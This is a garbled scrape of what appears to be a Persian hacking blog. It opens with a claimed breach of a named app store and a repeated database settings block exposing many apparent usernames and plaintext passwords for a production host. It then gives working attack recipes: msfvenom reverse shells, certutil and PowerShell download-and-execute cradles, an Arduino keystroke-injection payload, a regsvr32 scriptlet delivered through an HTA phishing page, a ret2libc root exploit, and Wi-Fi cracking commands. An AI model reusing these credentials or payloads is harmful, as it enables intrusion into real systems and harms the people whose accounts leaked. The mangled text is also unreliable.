Our coworkerse have been infiltrated; the main database is about 17 gigabytes, which will not be released due to security issues.
REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘modadi356639’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘amirhos178787’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘SMANE30071626’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘M13771377’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘amiri2020201’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘AR097813131’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘Eeza1378907’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘TOOOOOO888878’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘hasabcaaaaaafe’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘Hesmaaa’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘KHOHOCOOOO’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘AMAZING1378’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘AMIR1378MAHDI’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘NO09178881’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘MAHDII07’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘y137899969’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘tahayman1368’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘love98877’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘milad7khat98’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘13901390M’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘B1no1111’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘KAMALIIIIIIHA’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘hasanfadrdddi’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘jo808080’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘FErheste’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘FR11111111111 ‘, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { TELEGRAM: @HACKGM REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘Sinagolih’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘JANSINA1370’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘HI1234566666’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘mortezagholami’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘sadafff’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘S0933532o’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } { REDIS_HOST=’127.0.0.1′ REDIS_PORT=6379 REDIS_SOCKET=’/var/run/redis/redis.sock’ REDIS_PASSWORD= DATABASES[‘standby’]=DATABASES[‘default’] DATABASES[‘session_db’]={ ‘ENGINE’: ‘django.db.backends.postgresql_psycopg2’, ‘NAME’: ‘cafebazaar’, ‘USER’: ‘hamideslhami’, ‘HOST’: ‘pasha.cafebazaar.ir’, ‘PASSWORD’: ‘madar999999999’, ‘PORT’: 30009, # ‘OPTIONS’:{ # ‘autocommit’: True, # } {
https://youtu.be/5eYYosEY_hE
new(” localport=”>” 1337,=”” type=”>” reuse=”>” 1,=”” listen=”>” 10)=”” or=”” die=”” “$@\n”;=”” $client;=”” while($client=”$server->accept())” select=”” $client=”” “http=”” 1.0=”” ok\r\n”;=”” “content-type:=”” text=”” html\r\n\r\n”;=”” ‘<h1>######<=”” h1>=”” continue=”” close($client);=”” chld=”>” -$$;=”” enterback=”” tab19.upload=”” 20.perl=”” target.com:1337حالا=”” 1337=”” ببینید,کلام=”” ساله=”” بورس=”” ماندگی=”” مجال=”” میکردند=”” 90%=”” webapp=”” بودن=”” امیدوارم=”” استفادتون=”” باشه.https:=”” privilege_escalationhttps:=”” www.owasp.org=”” index.php=”” sql_injection-#influential=”” tacticsمراحل=”” جزئیات=”” میپردازم,تا=”” #roadmap=”” خیر.آقایان=”” بیسواد=”” غیرمستقیم=”” پشت=”” میزنند=”” گاف=”” تناقض=”” مسائل=”” درآوردی=”” #apt=”” محصور=”” قدرتمند=”” تصویر=”” مراحله=”” نداره=”” کرد.خب=”” میبریم=”” اشاراتی=”” کرد#persistenceدر=”” پنهان=”” bootkit=”” registry.#privilege=”” escalationدر=”” administator=”” میده.#defense=”” evasionدر=”” منجر=”” obfuscation=”” code=”” signing=”” افزارهای=”” میکنه.#credential=”” accessدر=”” آورد=”” credential=”” dumping.#dsicoveryدر=”” مپ=”” تهیه=”” پروسس=”” ها.#lateral=”” movementدر=”” قانونی=”” میره=”” rdp=”” shares#executionدر=”” execution=”” rundll32=”” msxml=”” powershell=”” regasm=”” گوناگونی=”” باشه.#collectionدر=”” جریان=”” keylogger=”” webcam=”” دیگه.#exiftrationدر=”” ارتباطات=”” آپلودهای=”” c&c=”” protocol=”” encrypt=”” compress=”” transfer=”” اطمینان=”” شدن.#command=”” controlخب=”” کننده=”” تیمی=”” مینویسه=”” ضعف=”” مشکل=”” انداخت=”” اختصاصی=”” الگریتم=”” dga=”” c&c.و=”” نکات=”” آیتم=”” میباشند,در=”” فراگیری=”” الزام=”” برسونه=”” ورود=”” pentesting=”” موفق=”” privilege=”” اساس=”” محسوب=”” میشه.حالا=”” گفتن=”” شاز=”” واقعا=”” ارزش=”” حد=”” شخصیت=”” کانالش=”” آقا=”” روانی=”” میبره=”” کنه,فضای=”” گروه=”” نیستند=”” شخصی=”” نواحی=”” اصلا=”” توهین=”” نیست.https:=”” www.fireeye.com=”” solutions=”” cyber-threat-intelligence.htmlبحث=”” عاملی=”” بهتره=”” راستای=”” بعضا=”” نظرات=”” خصومت=”” پیاده=”” نفوذهای=”” نیازمند=”” دایره=”” امکاناتی=”” کارهای=”” کمک=”” باشه,بسیاری=”” غیر=”” کارشناس=”” دیدم=”” دلیلشون=”” نباید=”” منظورشون=”” خلقت=”” باش=”” موس=”” کیبورد=”” ابزارهای=”” وبسرورها=”” بنویسه:)خب=”” اشخاصی=”” اصطلاحا=”” اینکاره=”” نیستن=”” چرا؟=”” بخواهید=”” نخواهید=”” لحاظ=”” ماموریت=”” بقیه=”” مشارکتی=”” پیشرو=”” بکنه=”” باشه؟=”” هدفتون=”” ارگانی=”” نقاط=”” ارگانه=”” کشورتون=”” ماموریی=”” پتانسیلی=”” علم=”” جلو=”” برتر=”” پیروزی=”” حریف=”” مقابل=”” آمده=”” افزاری=”” امکانات=”” مشکلاتی=”” آورده=”” جدی=”” بزرگی=”” میگیرید=”” میخواید=”” اتوماتیک=”” ابزارهایی=”” میبرم=”” blind=”” based–union=”” based–time=”” based–error=”” based–classic–out=”” of=”” band=”” بالای=”” سبب=”” قضیه=”” متفاوت=”” نزدیک=”” پنج=”” ,=”” هزار=”” آدمی=”” رویه=”” کره=”” حفظ=”” کنه؟:)=”” جامع=”” آسون=”” کاره=”” عاقلانه=”” بدین=”” راحت=”” شده؟؟؟=”” خیر=”” اختیار=”” اونور=”” هنرش=”” دقیقا=”” دندان=”” مصلح=”” رو,بتونه=”” بزنه=”” ابزاری=”” بنویسه=”” اومدید=”” دادید=”” آرایش=”” شدید=”” حکم=”” سریعا=”” tamper=”” آسان=”” آسانتر=”” کنه…در=”” همینه=”” سلیقه=”” برخورد=”” ایرادی=”” هیج=”” دوست=”” داری=”” باشی=”” بذارید=”” کنید,اکی=”” نیازه=”” محیطی=”” error=”” مواجه=”” نفوذیopen=”” terminal1.apt=”” curl=”” gnupg=”” apt-transport-https=”” liblttng-ust0=”” kali-linux-full=”” packages.microsoft.com=”” keys=”” microsoft.asc=”” apt-key=”” “deb=”” [arch=”amd64]” repos=”” microsoft-debian-stretch-prod=”” stretch=”” main”=”” sources.list.d=”” powershell.list=”” ftp.br.debian.org=”” pool=”” icu=”” libicu57_57.1-6+deb9u2_amd64.deb=”” dpkg=”” apt-get=”” python3-pip=”” 3.pip=”” osrframework=”” crypto=”” netifaces=”” python-nmap=”” pip3=”” 4.apt-get=”” veil=”” veil-evasion;=”” config=”” setup.sh=”” –force=”” –silent=”” 5.apt-get=”” exiftool=”” 6.dpkg=”” –add-architecture=”” i386=”” upgrade=”” dist-upgrade=”” full-upgrade=”” reboot=”” 7.apt-get=”” tor=”” alacarte=”” tcpxtract=”” tesseract-ocr=”” wine32=”” jd-gui=”” rarcrack=”” steghide=”” cupp=”” websploit=”” slowhttptest=”” autoconf=”” dnsmasq=”” upx-ucl=”” gifsicle=”” nodejs=”” npm=”” adb=”” bettercap=”” shellter=”” mono-vbnc=”” remmina=”” bleachbit=”” haproxy=”” vlc=”” uget=”” clinfo=”” aria2=”” smb4k=”” crackle=”” pptpd=”” cppcheck=”” gimp=”” xplico=”” openvas=”” isc-dhcp-server=”” clamav=”” routersploit=”” unicorn=”” calibre=”” enscript=”” ruby-dev=”” libpcap-dev=”” python-protobuf=”” wifiphisher=”” cmatrix=”” libreoffice=”” qrencode=”” crackmapexec=”” parallel=”” inspy=”” freerdp2-x11=”” rar=”” qbittorrent=”” mono-complete=”” zmap=”” datasploit=”” idb=”” gdb-peda=”” kerberoast=”” python-gps=”” bluetooth=”” bluez=”” libcrypto++6=”” android-tools-adb=”” zipalign=”” strace=”” libzen0v5=”” python-bluez=”” privoxy=”” polipo=”” socat=”” dotdotpwn=”” clamav-daemon=”” ffmpeg=”” network-manager-openvpn-gnome=”” multiarch-support=”” etherape=”” dkms=”” virtualbox=”” libjpeg62-turbo-dev=”” libnfnetlink-dev=”” 8.apt-get=”” virtualbox-guest-x11=”” gem=”” –upgrade=”” -g=”” http-proxy-to-socks=”” 9.openvas-setup=”” generate10.openvas-start=”” 127.0.0.1:9392=”” username:(admin)=”” password:(paste=”” generate)11.hexeditor=”” press=”” ctrl+w=”” tab=”” search=”” (geteuid)=”” entereditgeteuid=”” replacegetppid=”” enter12.update-java-alternatives=”” –set=”” jvm=”” java-1.8.0-openjdk-amd64=”” 13.rm=”” fonts=”” download=”” fix-fonts.zip=”” directory14.unzip=”” cp=”” fix-fonts=”” 15.fc-cache=”” -v=”” پلاگین=”” کارآمد=”” firefoxtamper=”” data–hackbar–http=”” live–user-agent=”” switcher–flagfox–cookie=”” manager–wappalyzer–blur–copy=”” plaintext–foxyproxy=”” standard–privacy=”” badger–disconnect–noscript=”” قسمتی=”” انتهایی=”” جداسازی=”” عددها=”” گذاشتم=”” نشه=”” اینتر=”” بس=”” اینطوری=”” کاربرهامون=”” پیادسازی=”” :stuck_out_tongue_winking_eye:=”” پایپ=”” مو=”” لینوکسی=”” ماژولی=”” errori=”” بشما=”” نخواهد=”” خیال=”” بپردازید.=”” :blush::warning:نکته=”” 2018-64bit=”” میباشد…http:=”” www.sqlinjection.net=”” category=”” attacks=”” www.capterra.com=”” database-management-software=”” itsfoss.com=”” linux-hacking-penetration-testing=”” techlog360.com=”” top-ethical-hacking-operating-systems=”” www.droidbro.com=”” best-os-for-penetration-testing-ethical-hacking-linux=”” #bypass=”” detections=”” oob=”” runnerبد=”” میتواند=”” نظارتی=”” باینری=”” پروتکلی=”” بزنیم=”” مختصری=”” کنیم.خب=”” امروزه=”” خصوص=”” ویندوزهای=”” 7,10=”” @empire=”” اسکریپ=”” @invoke-obfuscation=”” @invoke-shellcode=”” متعددی=”” اینکد=”” آنتی=”” اخیر=”” اومده,حالا=”” رندر=”” certutil.exe=”” cert=”” جستجوگر=”” amsi=”” injection=”” استعداد=”” خوردن=”” windefender=”” شدopen=”” terminal1.git=”” danielbohannon=”” invoke-cradlecrafter.git;apt=”” update;apt=”” 2.curl=”” -;echo=”” powershell.list;apt=”” 3.wget=”” libicu57_57.1-6+deb9u2_amd64.deb;dpkg=”” 4.msfvenom=”” reverse_https=”” powershell_base64=”” psh=”” load.txt=”” tab4.apt=”” powershell;service=”” start;cd=”” invoke-cradlecrafter;pwsh=”” 5.import-module=”” invoke-cradlecrafter.psd1=”” 6.invoke-cradlecrafter=”” 7.set=”” url=”” 8.memory=”” 9.certutil=”” 10.all=”” 11.1=”” (result)=”” contentopen=”” tab12.nano=”” raw.txt=”” contentset-variable=”” rav=”” ‘http:=”” load.txt’;iex…-skip=”” 2)-join”`r`n”))=”” enterswitch=”” virtualbox(win7)=”” (lan)=”” c:\open=”” cmd13.cd=”” c:\=”” certutil=”” -encode=”” cert.cer=”” go=”” kali=”” cert.ceropen=”” terminal14.msfconsole=”” reverse_https;set=”” 443;set=”” autorunscript=”” priv_migrate;set=”” true;exploit=”” -j=”” -z”=”” 15.powershell.exe=”” -win=”” hidden=”” -exec=”” bypass=”” add-content=”” -path=”” %appdata%\cert.cer=”” (new-object=”” net.webclient).downloadstring(‘http:=”” cert.cer’);=”” -decode=”” %appdata%\stage.ps1=”” b=”” powershell.exe=”” -noexit=”” -file=”” del=”” مربوطه=”” obfuscate=”” کرد,در=”” میکنیم,خط=”” بشه,خط=”” msfvenom,خط=”” کامند=”” آپاچی=”” پاورشل=”” ششم=”” credlecrafter=”” هفتم=”” ریختیم=”” اسکریپت,خط=”” هشتم=”” شد,خط=”” نهم=”” cretutil=”” دهم=”” یازدهم=”” فایلی=”” میدیم,خط=”” سیزدهم=”” \:c=”” چهاردهم=”” پانزدهم=”” وبسرور=”” اونرو=”” decode=”” %appdata%=”” stage.ps1=”” cer=”” https=”” جوره=”” soc=”” نکتش=”” اس=”” الشه=”” invoke-cradlecrafterhttps:=”” docs.microsoft.com=”” windows-server=”” administration=”” windows-commands=”” certutil خب=”” درگاه=”” چند=”” داشتم=”” مقاله=”” میخوندم=”” میداد=”” آپدیت=”” easyjtag=”” موقع=”” امروز=”” بهتر=”” arduino=”” نویسیش=”” کنیم,و=”” موجب=”” بتونیم=”” سرآخر=”” دستوری=”” atmega32u4=”” نوشتم=”” افزاریش=”” ارزون=”” کنیدمرحله=”” میسازیمopen=”” terminal1.apt-get=”” arduino;service=”” postgresql=”” start;msfconsole=”” 2;set=”” (noip);exploit=”” [*]=”” run=”” following=”” on=”” machine:powershell.exe=”” -nop=”” $f=”new-object” net.webclient;$f.proxy=”[Net.WebRequest]::GetSystemWebProxy();$f.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX” $f.downloadstring(‘http:=”” (noip):8080=”” 81ztcfy2kk16ed’);=”” کنیم2.touch=”” arduino_payload.ino=”” <keyboard.h>=”” setup()=”” keyboard.begin();=”” keyboard.press(key_left_gui);=”” delay(1000);=”” keyboard.press(‘x’);=”” keyboard.releaseall();=”” delay(500);=”” typekey(‘a’);=”” delay(100);=”” keyboard.press(key_left_alt);=”” keyboard.press(‘y’);=”” keyboard.print(“powershell.exe=”” 81ztcfy2kk16ed’);”);=”” typekey(key_return);=”” keyboard.end();=”” loop()=”” {}=”” typekey(int=”” key){=”” keyboard.press(key);=”” keyboard.release(key);=”” enterما=”” ساپورت=”” میکنه,یک=”” keyboard.h=”” keyboard.print=”” نهایت=”” مهمش=”” محدودیتی=”” #invoke-obfuscation=”” مبهمش=”” شد,سر=”” برد=”” leonardo=”” burn=”” bootloader=”” وقتی=”” امادس=”” ویندوزی…http:=”” arduino.ir=”” arduinoboardmicrohttps:=”” www.arduino.cc=”” reference=”” en=”” functions=”” keyboard=”” sct=”” کرد<?xml=”” <scriptlet>=”” <registration=”” progid=”ttEU3jlH” classid=”{94fc67df-921b-335e-a900-1485bbd66997}” <script><![cdata[=”” activexobject(“wscript.shell”).run(“powershell.exe=”” $n=”new-object” net.webclient;$n.proxy=”[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX” $n.downloadstring(‘http:=”” 192.168.1.4:5151=”” an17mowq’);”,0);]]>=”” script>=”” registration>=”” scriptlet>=”” object=”” activex=”” wscript.shell=”” داره,همین=”” همینطوره=”” کشیده=”” کجاس,در=”” whitelist=”” تحدیدی=”” نهانتر=”” کمتر=”” جلب=”” کنه,اما=”” چیه؟همونطور=”” میدونید=”” پسرخاله=”” hta=”” vbscript=”” میکنمopen=”” terminal1.msfconsole=”” 3;set=”” 81;set=”” machine:regsvr32=”” s=”” u=”” i:http:=”” ######.ddns.net:81=”” r8jf2isimgcsoj7.sct=”” scrobj.dll=”” یک2.wget=”” –no-check-certificate=”” index.html=”” -k=”” -u=”” “mozilla=”” 5.0=”” (macintosh;=”” intel=”” macos=”” 10_12_5)=”” applewebkit=”” 537.36=”” (khtml,=”” like=”” gecko)=”” chrome=”” 58.0.3029.110=”” safari=”” 537.36″=”” “https:=”” www.microsoft.com=”” software-download=”” windows10iso”=”” فیشینگ=”” گذاشتن=”” صفحه3.leafpad=”” search(<=”” body>)<script=”” function=”” var_func()=”” dim=”” var_shell=”” set=”” var_shell.run=”” “regsvr32.exe=”” scrobj.dll”,=”” 0,=”” true=”” end=”” var_func=”” self.close=”” script><=”” body>=”” closeدر=”” دانلودی=”” بجاش=”” برید4.mv=”” index.hta=”” 5.mv=”” 6.ngrok=”” 80=”” همینطور=”” dns=”” گرفتیم=”” بگید=”” ماکروسافته=”” کن=”” :)نکته=”” بجای=”” مایکروسافتی=”” فرقی=”” شکلی=”” باشهhttps:=”” a48982be.ngrok.io=”” index.htaبر=”” شوت=”” alert=”” ندارند=”” بسیارکار=”” آمدی=”” defender=”” شد…https:=”” www.corelan.be=”” index.php چرا=”” دارند,اما=”” aslr=”” dep=”” بزنه؟=”” سادس=”” system()=”” اجرایی=”” دستان=”” نیازی=”” زحمت=”” nx-bit=”” بخورند=”” کنیدopen=”” terminal1.nano=”” bof_stack.c=”” <stdlib.h>=”” <unistd.h>=”” <stdio.h>=”” <string.h>=”” getpath()=”” buffer[64];=”” ret;=”” printf(“input=”” path=”” please:=”” “);=”” fflush(stdout);=”” gets(buffer);=”” ret=”__builtin_return_address(0);” if((ret=”” 0xbf000000)=”=” printf(“bzzzt=”” (%p)\n”,=”” ret);=”” _exit(1);=”” printf(“got=”” %s\n”,=”” buffer);=”” main(int=”” argc,=”” **argv)=”” getpath();=”” enter2.gcc=”” bof_stack=”” stack=”” bof=”” هست,حالا=”” rop=”” تکه=”” درونش=”” bash=”” بزنه,خب=”” “bin=”” sh”=”” دیباگر=”” میشیم3.strings=”” libc-2.11.2.so=”” 11f3bf=”” sh4.gdb=”” (gdb)=”” starting=”” program:=”” bof_stack(gdb)=”” info=”” map=”” process=”” 1727cmdline=”/root/bof_stack” cwd=”/home/user” exe=”/root/bof_stack” mapped=”” spaces:start=”” addr=”” size=”” objfile0x8048000=”” 0x8049000=”” 0x1000=”” bof_stack0x8049000=”” 0x804a000=”” bof_stack0xb7e96000=”” 0xb7e97000=”” 0xb7fd5000=”” 0x13e000=”” libc-2.11.2.so0xb7fd5000=”” 0xb7fd6000=”” libc-2.11.2.so0xb7fd6000=”” 0xb7fd8000=”” 0x2000=”” libc-2.11.2.so0xb7fd8000=”” 0xb7fd9000=”” 0x140000=”” libc-2.11.2.so0xb7fd9000=”” 0xb7fdc000=”” 0x3000=”” 0xb7fde000=”” 0xb7fe2000=”” 0x4000=”” 0xb7fe3000=”” [vdso]0xb7fe3000=”” 0xb7ffe000=”” 0x1b000=”” ld-2.11.2.so0xb7ffe000=”” 0xb7fff000=”” 0x1a000=”” ld-2.11.2.so0xb7fff000=”” 0xb8000000=”” ld-2.11.2.so0xbffeb000=”” 0xc0000000=”” 0x15000=”” [stack](gdb)=”” 0xb7e97000+0x11f3bf=”” 0xb7fb63bf:=”” sh”(gdb)=”” p=”” $1=”{<text” variable,=”” info>}=”” 0xb7ecffb0=”” <__libc_system>واووو=”” strings…=”” 0xb7fb63bf=”” اکسپلویتopen=”” tab5.nano=”” rop_exp.py=”” addedimport=”” struct=”” padding=”0000AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHJJJJIIIIKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSS” 0xb7ecffb0)=”” return_after_system=”AAAA” bin_sh=”struct.pack(“I”,” 0xb7fb63bf)=”” enter6.(python=”” rop_exp.py;=”” cat)=”” input=”” got=”” 0000aaaabbbbccccddddeeeeffffgggghhhhjjjjiiiikkkkllllmmmmnnnnoooo���qqqqrrrrssss���aaaa�c��id=”” euid=”0(root)” برگشتیم=”” کردیم…https:=”” return-to-libc_attackخب=”” انجامه=”” شرط=”” سبک,یک=”” کاربری=”” رمزش=”” ۵=”” دقیقه=”” ببیره=”” ۱=”” سال,اکی=”” روند=”” سازیشopen=”” (interface)4.airodump-ng=”” (interface-mode)wait=”” (handshake)=”” (interface-mode)open=”” tab6.aireplay-ng=”” -0=”” (station)=”” (interface-mode)در=”” اطلاعاتش=”” airodump-ng=”” زیره=”” شبکش=”” کنه,در=”” کنیمaircrack-ng7.aircrack-ng=”” -a(1=”WEP/2=WPA)” -b=”” (passlist).txt=”” (handshake).capcrunch7.crunch=”” (min=”” len)=”” (max=”” “(characters)”=”” aircrack-ng=”” (handshake).cap=”” (essid)example7.crunch=”” “1234567890”=”” afshin@@@@@@=”” -a2=”” 01.cap’=”” wifi-######=”” cowpatty7.cowpatty=”” -s=”” (essid)genpmk7.genpmk=”” (essid)passgen7.git=”” blmvxer=”” passgen.git=”” 8.cd=”” passgen=”” passgen.py=”” 9.python=”” -lu1=”” -w-=”” (handshake).caphashcat7.aircrack-ng=”” wpacrack=”” 8.hashcat=”” 2500=”” wpacrack.hccap=”” (passlist).txtدر=”” passlist=”” کنیم,در=”” بعدیش=”” بروت=”” فورس=”” نداره,در=”” cowpatty=”” رنگین=”” کمانی=”” کرک,اکی=”” wps=”” lock=”” بیاریدreaver5.reaver=”” (interface-mode)=”” (essid)=”” -vvv=”” tab6.pixiewps=”” (pke)=”” (pkr)=”” (e-hash1)=”” -z=”” (e-hash2)=”” (authkey)=”” -n=”” (e-nonce)wpspin5.wget=”” 0x90=”” wps-scripts=”” wpspin.py;chmod=”” wpspin.py=”” 6.python=”” (last=”” bssid#6)7.reaver=”” (pin)=”” -vv=”” bully5.bully=”” reaver=”” هش=”” pke=”” pixiewps=”” تشخیص=”” بیاره,تکنیک=”” wpspin=”” بیاره,در=”” bully=”” سعی=”” بشه,و=”” mac-filter=”” دارaireplay-ng5.airodump-ng=”” (interface-mode)mdk35.mdk3=”” (bssid)wait=”” ctrl+copen=”” tab6.mdk3=”” l=”” (bssid)شبکه=”” aireplay-ng=”” نویزی=”” میکنه,در=”” mdk3=”” حدس=”” بزنیمmacchanger5.netdiscover=”” (mac=”” target)7.ifconfig=”” (interface)=”” down=”” 8.macchanger=”” target)=”” (interface)9.ifconfig=”” up=”” 10.macchanger=”” (interface)بعد=”” اسکن=”” mac-address=”” اعضای=”” میدزدید=”” ست=”” راحتی… #lammer=”” hackersاین=”” ویدیو=”” اثبات=”” شیاد=”” دوز=”” نخبه=”” بزنند,کسی=”” لمر=”” واقعیه=”” سندش…#eq=”” mainبد=”” هوش=”” هیجانی=”” همکاری=”” علائم=”” ناکار=”” آمد=”” کرد… در=”” قصد=”” دارم=”” هایم=”” بهمرور،=”” مجموعهای=”” مطالب=”” مرتبط=”” کارگروهی،فرصتها=”” چالشهای=”” نمایم.قطعا=”” شرعی=”” بضاعت=”” خود،بعد=”” آفت=”” کردیم،تلاش=”” نماییم=”” محدوده=”” اختیارات=”” معضلات=”” کمرنگ=”” شوند.امیدوارم=”” روزافزون=”” رود.#آفت=”” ۱:=”” همکارانی=”” نمیکنند=”” چنان=”” ظاهرسازی=”” میکنند=”” سایرین=”” عمدهای=”” دوش=”” آنها=”” بهحساب=”” میآید،افرادی=”” میدهند=”” تأثیرگذاری=”” وانمود=”” انگار=”” 100%=”” درحالیکه=”” کمترین=”” تعهد=”” دارند.این=”” میتواند=”” نماید=”” گروه,قطعاً=”” خاطی=”” اصلاح=”” نماید.این=”” فیلم=”” کوتاه=”” نمونهای=”” باشد.https:=”” 